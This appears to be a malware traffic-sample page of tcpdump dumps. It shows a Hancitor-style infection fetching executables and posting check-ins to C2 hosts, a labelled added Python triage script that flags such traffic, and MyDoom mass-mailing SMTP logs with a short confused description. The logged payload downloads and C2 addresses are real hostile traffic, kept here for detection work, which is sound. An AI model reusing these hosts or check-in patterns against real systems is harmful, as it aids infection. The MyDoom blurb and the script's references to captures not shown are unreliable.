2019-07-25 13:05:46.346765 IP 94.124.9.53.80 > 10.7.25.101.49179: Flags [P.], seq 1:1347, ack 342, win 64240, length 1346: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Thu, 25 Jul 2019 17:05:39 GMT
Server: Apache
Last-Modified: Tue, 23 Jul 2019 10:59:38 GMT
Accept-Ranges: bytes
Content-Length: 110592
Connection: close
Content-Type: application/x-msdownload

2019-07-25 13:05:46.540594 IP 10.7.25.101.49182 > 77.120.115.221.80: Flags [P.], seq 1:152, ack 1, win 64240, length 151: HTTP: POST /f5lkB/index.php HTTP/1.1
POST /f5lkB/index.php HTTP/1.1
Host: todratsake.ru
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

e0=1000101001&

2019-07-25 13:05:46.540724 IP 77.120.115.221.80 > 10.7.25.101.49182: Flags [.], ack 152, win 64240, length 0
2019-07-25 13:05:47.588118 IP 10.7.25.101.49184 > 31.44.184.33.80: Flags [P.], seq 1:201, ack 1, win 64240, length 200: HTTP: GET /H7mp HTTP/1.1
GET /H7mp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3; .NET CLR 2.0.50727)
Host: 31.44.184.33
Connection: Keep-Alive
Cache-Control: no-cache

2019-07-25 13:05:47.588274 IP 31.44.184.33.80 > 10.7.25.101.49184: Flags [.], ack 201, win 64240, length 0
2019-07-25 13:05:47.646083 IP 83.220.175.185.80 > 10.7.25.101.49185: Flags [S.], seq 1514318061, ack 732422481, win 64240, options [mss 1460], length 0
2019-07-25 13:05:47.646247 IP 10.7.25.101.49185 > 83.220.175.185.80: Flags [.], ack 1, win 64240, length 0
2019-07-25 13:05:47.646312 IP 10.7.25.101.49185 > 83.220.175.185.80: Flags [P.], seq 1:151, ack 1, win 64240, length 150: HTTP: POST /f5lkB/index.php HTTP/1.1
POST /f5lkB/index.php HTTP/1.1
Host: codeotso.com
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

d1=1000101001&

2019-07-25 13:05:47.646371 IP 83.220.175.185.80 > 10.7.25.101.49185: Flags [.], ack 151, win 64240, length 0
2019-07-25 13:05:47.662936 IP 10.7.25.101.49186 > 31.44.184.33.80: Flags [S], seq 291674496, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-25 13:05:47.758694 IP 77.120.115.221.80 > 10.7.25.101.49183: Flags [FP.], seq 187, ack 154, win 64239, length 0
2019-07-25 13:05:47.758957 IP 10.7.25.101.49183 > 77.120.115.221.80: Flags [.], ack 188, win 64054, length 0
2019-07-25 13:05:47.763295 IP 31.44.184.33.80 > 10.7.25.101.49184: Flags [P.], seq 1:122, ack 201, win 64240, length 121: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Date: Thu, 25 Jul 2019 21:05:22 GMT
Content-Length: 210944

2019-07-25 13:05:48.827934 IP 10.7.25.101.49187 > 31.44.184.33.80: Flags [P.], seq 1:368, ack 1, win 64240, length 367: HTTP: GET /visit.js HTTP/1.1
GET /visit.js HTTP/1.1
Accept: */*
Cookie: D6CFR6fSx/2pSZ6OGAbt8JcWC6fjnf0iRH/lXdUuFoUeISeBOx4dHDkZGpLFCgSVAKGsc73GvXP0V+JT4J/NSi6vVSuEzjcFPy8q5lYtHAmcacE1cATGok6yawYmMTtyhx2I0swd+ECPu/GZEjnwuxElE6bQjaa4PTvKsU3FWt4=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: 31.44.184.33
Connection: Keep-Alive
Cache-Control: no-cache

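An added example, not code from the original page or from any tool named above: a small triage script that parses tcpdump summary lines like the ones in these captures and flags what the two samples show, the ngrok.io hostname from the Lord EK capture and the Hancitor check-in POST plus executable downloads from the capture just above. The SAMPLE lines are copied from these captures with the binary residue removed; the finding names and the check-in regex are the example's own.

```python
"""Triage of tcpdump summary lines like those in the captures above. Added
example, not code from the original page or from any tool it names. It parses
tcpdump's one-line summaries (timestamp, src > dst, then 'A? name.' for DNS or
'HTTP: <request-line>'), attaches the Host:, Content-Type: and Content-Length:
lines and the form body that follow each summary, and flags what the samples
show: ngrok.io hostnames (Lord EK), executable downloads and the Hancitor
check-in body. SAMPLE is copied from the captures above minus binary residue.
"""
import re

SUMMARY_RE = re.compile(r"^(?P<ts>\d{4}-\d\d-\d\d \S+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
                        r"(?P<dst>[\d.]+)\.(?P<dport>\d+): (?P<rest>.*)$")
DNS_RE = re.compile(r"\bA\? (?P<name>[\w.-]+)\.")
REQ_RE = re.compile(r"HTTP: (?P<method>GET|POST) (?P<path>\S+) HTTP/1\.[01]")
RESP_RE = re.compile(r"HTTP: HTTP/1\.[01] (?P<status>\d{3})")
HDR_RE = re.compile(r"^(?P<name>Host|Content-Type|Content-Length): (?P<val>\S.*)$")
# Hancitor check-in body as it appears in the capture above (regex constructed here).
HANCITOR_BODY_RE = re.compile(r"^id=\d+&sd=[0-9a-f]+&vs=[\d.]+&.*&pc=(?P<pc>[^&]+)&un=(?P<un>[^&]*)&?$")
EXE_TYPES = {"application/octet-stream", "application/x-msdownload"}


def parse(lines):
    """Return (dns_queries, http_transactions); each transaction is a dict."""
    dns, txs, by_flow = [], [], {}
    tx, side = None, ""             # transaction that following header/body lines belong to
    for line in lines:
        m = SUMMARY_RE.match(line)
        if m is None:               # header, body, blank, or binary residue line
            h = HDR_RE.match(line)
            if tx is not None and h:
                tx[side][h["name"]] = h["val"]
            elif tx is not None and side == "req" and line.startswith("id="):
                tx["body"] = line
            continue
        tx, rest = None, m["rest"]
        d = DNS_RE.search(rest)
        if d and m["dport"] == "53":
            dns.append((m["ts"], d["name"]))
        elif r := REQ_RE.search(rest):
            tx, side = {"ts": m["ts"], "dst": m["dst"], "method": r["method"], "path": r["path"],
                        "status": "", "body": "", "req": {}, "resp": {}}, "req"
            txs.append(tx)
            by_flow[(m["src"], m["sport"], m["dst"], m["dport"])] = tx
        elif p := RESP_RE.search(rest):     # server -> client: request is the reversed 4-tuple
            tx, side = by_flow.get((m["dst"], m["dport"], m["src"], m["sport"])), "resp"
            if tx is not None:
                tx["status"] = p["status"]
    return dns, txs


def triage(lines):
    """Flag the behaviours discussed above; returns a list of (kind, timestamp, detail)."""
    dns, txs = parse(lines)
    out = [("dns_ngrok_tunnel", ts, name) for ts, name in dns if name.endswith(".ngrok.io")]
    for t in txs:
        host = t["req"].get("Host", t["dst"])
        url = f"{t['method']} {host}{t['path']}"
        if host.endswith(".ngrok.io"):
            out.append(("http_to_ngrok_tunnel", t["ts"], url))
        if t["path"].lower().endswith((".exe", ".dll")) or t["resp"].get("Content-Type") in EXE_TYPES:
            out.append(("exe_download", t["ts"],
                        f"{url} status={t['status'] or '?'} bytes={t['resp'].get('Content-Length', '?')}"))
        if b := HANCITOR_BODY_RE.match(t["body"]):
            out.append(("hancitor_checkin", t["ts"], f"{url} pc={b['pc']} un={b['un']}"))
    return out


SAMPLE = """\
2019-08-01 13:19:06.834029 IP 10.8.1.102.65094 > 10.8.1.1.53: 46499+ A? 7b2cdd48.ngrok.io. (35)
2019-08-01 13:19:06.941145 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?GHRYb1AYhUQ7CY1Z3sfJHfdgiXnfmlZgiC2g7pV52z6UG8W3Lq4k0vs0ZIdzxVuY HTTP/1.1
Host: 7b2cdd48.ngrok.io
2019-07-25 13:00:41.167225 IP 10.7.25.101.49158 > 83.220.175.185.80: Flags [P.], seq 1:231, ack 1, win 64240, length 230: HTTP: POST /f5lkB/index.php HTTP/1.1
Host: codeotso.com
id=3967861396&sd=fdf0b4&vs=1.41&ar=0&bi=1&lv=0&os=9&av=0&pc=HIDDENROAD-PC&un=richy.richardson&
2019-07-25 13:00:42.104328 IP 10.7.25.101.49160 > 92.53.96.153.80: Flags [P.], seq 1:327, ack 1, win 64240, length 326: HTTP: GET /wp-includes/pomo/p.exe HTTP/1.1
Host: material-nerud.ru
2019-07-25 13:00:42.275225 IP 92.53.96.153.80 > 10.7.25.101.49160: Flags [P.], seq 1:1347, ack 327, win 64240, length 1346: HTTP: HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 300032
"""
```

Running `triage(SAMPLE.splitlines())` yields four findings in capture order: the ngrok.io DNS lookup, the GET to the ngrok.io host, the Hancitor check-in with pc=HIDDENROAD-PC, and the 300032-byte p.exe download; the binary residue lines of a real tcpdump -A dump are skipped because they never match a summary or header pattern.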
MyDoom DDoS $38 Billion Dollar P2P Malware Botnet PCAP Download Traffic Sample

MyDoom Botnet

MyDoom has several kinds of impact, but its main attacks are DDoS.
MyDoom uses a DGA for its P2P communications, but also some command-and-control servers.

MyDoom, the fastest-spreading malware, caused an estimated $38.7 billion in damage to Microsoft Windows-based computers. Spyware is malware that extracts a company's confidential information without the company's knowledge.

2019-07-15 13:00:22.289866 IP 10.7.15.101.51171 > 10.7.15.1.53: 48767+ MX? acm.org. (25)
2019-07-15 13:00:22.340366 IP 10.7.15.1.53 > 10.7.15.101.51171: 48767 1/0/0 MX mail.mailroute.net. 10 (59)
2019-07-15 13:00:22.348650 IP 10.7.15.101.53658 > 10.7.15.1.53: 65013+ A? mail.mailroute.net. (36)
2019-07-15 13:00:22.382026 IP 10.7.15.1.53 > 10.7.15.101.53658: 65013 2/0/0 A 199.89.1.120, A 199.89.3.120 (68)
2019-07-15 13:00:22.382637 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [S], seq 3423424506, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-15 13:00:22.501570 IP 199.89.1.120.25 > 10.7.15.101.49163: Flags [S.], seq 2591540629, ack 3423424507, win 64240, options [mss 1460], length 0
2019-07-15 13:00:22.501779 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [.], ack 1, win 64240, length 0
2019-07-15 13:00:22.824195 IP 199.89.1.120.25 > 10.7.15.101.49163: Flags [P.], seq 1:66, ack 1, win 64240, length 65: SMTP: 220-in-014.lax.mailroute.net ESMTP Postfix - Postscreen enabled
2019-07-15 13:00:22.928682 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [.], ack 66, win 64175, length 0
2019-07-15 13:00:24.456432 IP 10.7.15.101.49164 > 157.130.29.226.1042: Flags [S], seq 824150712, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-15 13:00:24.924489 IP 10.7.15.101.62796 > 10.7.15.1.53: 51271+ MX? lists.freedesktop.org. (39)
2019-07-15 13:00:24.988231 IP 10.7.15.101.53695 > 10.7.15.1.53: 22968+ MX? global.libreoffice.org. (40)
2019-07-15 13:00:25.049108 IP 10.7.15.101.57533 > 10.7.15.1.53: 46764+ MX? global.libreoffice.org. (40)
2019-07-15 13:00:25.112279 IP 10.7.15.101.61829 > 10.7.15.1.53: 57956+ MX? documentfoundation.org. (40)
2019-07-15 13:00:25.174765 IP 10.7.15.101.53237 > 10.7.15.1.53: 64071+ MX? libreoffice.org. (33)
2019-07-15 13:00:25.237468 IP 10.7.15.101.50685 > 10.7.15.1.53: 56734+ MX? libreoffice.org. (33)
2019-07-15 13:00:25.939540 IP 10.7.15.101.62796 > 10.7.15.1.53: 51271+ MX? lists.freedesktop.org. (39)
2019-07-15 13:00:26.001128 IP 10.7.15.101.53695 > 10.7.15.1.53: 22968+ MX? global.libreoffice.org. (40)
2019-07-15 13:00:26.062827 IP 10.7.15.101.57533 > 10.7.15.1.53: 46764+ MX? global.libreoffice.org. (40)
2019-07-15 13:00:26.126226 IP 10.7.15.101.61829 > 10.7.15.1.53: 57956+ MX? documentfoundation.org. (40)
2019-07-15 13:00:26.187392 IP 10.7.15.101.53237 > 10.7.15.1.53: 64071+ MX? libreoffice.org. (33)
2019-07-15 13:00:30.460095 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 1:54, ack 1, win 64240, length 53: SMTP: 220 gabe.freedesktop.org ESMTP Postfix (Debian/GNU)
2019-07-15 13:00:30.460605 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 1:15, ack 54, win 64187, length 14: SMTP: EHLO acm.org
2019-07-15 13:00:30.460715 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 15, win 64240, length 0
2019-07-15 13:00:30.541199 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [S.], seq 678655145, ack 2272612538, win 64240, options [mss 1460], length 0
2019-07-15 13:00:30.541436 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [.], ack 1, win 64240, length 0
2019-07-15 13:00:30.601674 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 54:197, ack 15, win 64240, length 143: SMTP: 250-gabe.freedesktop.org
250-gabe.freedesktop.org
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN

2019-07-15 13:00:30.602630 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 15:43, ack 197, win 64044, length 28: SMTP: MAIL FROM:fdrake@acm.org
2019-07-15 13:00:30.602753 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 43, win 64240, length 0
2019-07-15 13:00:30.735767 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 197:211, ack 43, win 64240, length 14: SMTP: 250 2.1.0 Ok
2019-07-15 13:00:30.736105 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 43:88, ack 211, win 64030, length 45: SMTP: RCPT TO:libreoffice@lists.freedesktop.org
2019-07-15 13:00:30.736205 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 88, win 64240, length 0
2019-07-15 13:00:31.087379 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 1:62, ack 1, win 64240, length 61: SMTP: 220 vm194.documentfoundation.org ESMTP Postfix (Debian/GNU)
2019-07-15 13:00:31.087804 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 1:30, ack 62, win 64179, length 29: SMTP: EHLO global.libreoffice.org
2019-07-15 13:00:31.087907 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 30, win 64240, length 0
2019-07-15 13:00:31.270207 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 62:203, ack 30, win 64240, length 141: SMTP: 250-vm194.documentfoundation.org
250-vm194.documentfoundation.org
250-PIPELINING
250-SIZE 41943040
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN

2019-07-15 13:00:31.271261 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 30:77, ack 203, win 64038, length 47: SMTP: MAIL FROM:postmaster@global.libreoffice.org
2019-07-15 13:00:31.271380 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 77, win 64240, length 0
2019-07-15 13:00:31.481963 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 203:217, ack 77, win 64240, length 14: SMTP: 250 2.1.0 Ok
2019-07-15 13:00:31.482279 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 77:121, ack 217, win 64024, length 44: SMTP: RCPT TO:marketing@global.libreoffice.org
2019-07-15 13:00:31.482382 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 121, win 64240, length 0
2019-07-15 13:00:31.686040 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 217:291, ack 121, win 64240, length 74: SMTP: 450 4.7.25 Client host rejected: cannot find your hostname, [173.46.3.9]
2019-07-15 13:01:10.499434 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15417, win 64240, length 0
2019-07-15 13:01:10.499471 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15417:15490, ack 277, win 63964, length 73: SMTP: CsT9qUFJrxQMiBqS5+ujrJr2AxIIs09LsG+iA3CPkMqtdS2sgcamxnnGrtA4ivDGLtbED1P
2019-07-15 13:01:10.499509 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15490, win 64240, length 0
2019-07-15 13:01:10.499581 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15490:15568, ack 277, win 63964, length 78: SMTP: E7QcAFvXa9SwaF1MA+25XC6Xb+5j72HwbPEgNsvlcvJT82X0dPX2abBcLrdR9274Z/lz+rkty1Y9
2019-07-15 13:01:10.499614 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15568, win 64240, length 0
2019-07-15 13:01:10.499657 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15568:15646, ack 277, win 63964, length 78: SMTP: VGVtRtNw2zXLZtTVctbXB9h5Stc122bZ2kk629xG3S9X13Vd3hvfD+AL4RPixF3TNE3j5OXm52Lo
2019-07-15 13:01:10.499691 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15646, win 64240, length 0
2019-07-15 13:01:10.499734 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15646:15724, ack 277, win 63964, length 78: SMTP: ayRiB6m+hApMrsThtQk5GBJlW44m81qQKIQEp2QE4j0jTGYk/2GSAblMTNfzYTeCklCW7FAxj2Rb
2019-07-15 13:01:10.499767 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15724, win 64240, length 0
2019-07-15 13:01:10.499810 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15724:15803, ack 277, win 63964, length 79: SMTP: 2NcgGtBqBSLnY giJR0CBABxailQGXkwC0KBXZVbPzoFEy/y8ip3S5Nl4Dcv9kIc7Nsh3/GkPxg5D
2019-07-15 13:01:10.499843 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15803, win 64240, length 0
2019-07-15 13:01:10.499885 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15803:15852, ack 277, win 63964, length 49: SMTP: Wd5SdLNn/C0eKzCNUzbpLcJolBHSO1nx/hqx/g+lBVp+vKY
2019-07-15 13:01:10.499919 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15852, win 64240, length 0
2019-07-15 13:01:10.499962 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15852:15874, ack 277, win 63964, length 22: SMTP: WwwouqTVQl4axZk+9NR8
2019-07-15 13:01:10.499995 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15874, win 64240, length 0
2019-07-15 13:01:10.500037 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15874:15886, ack 277, win 63964, length 12: SMTP: fFly N+umw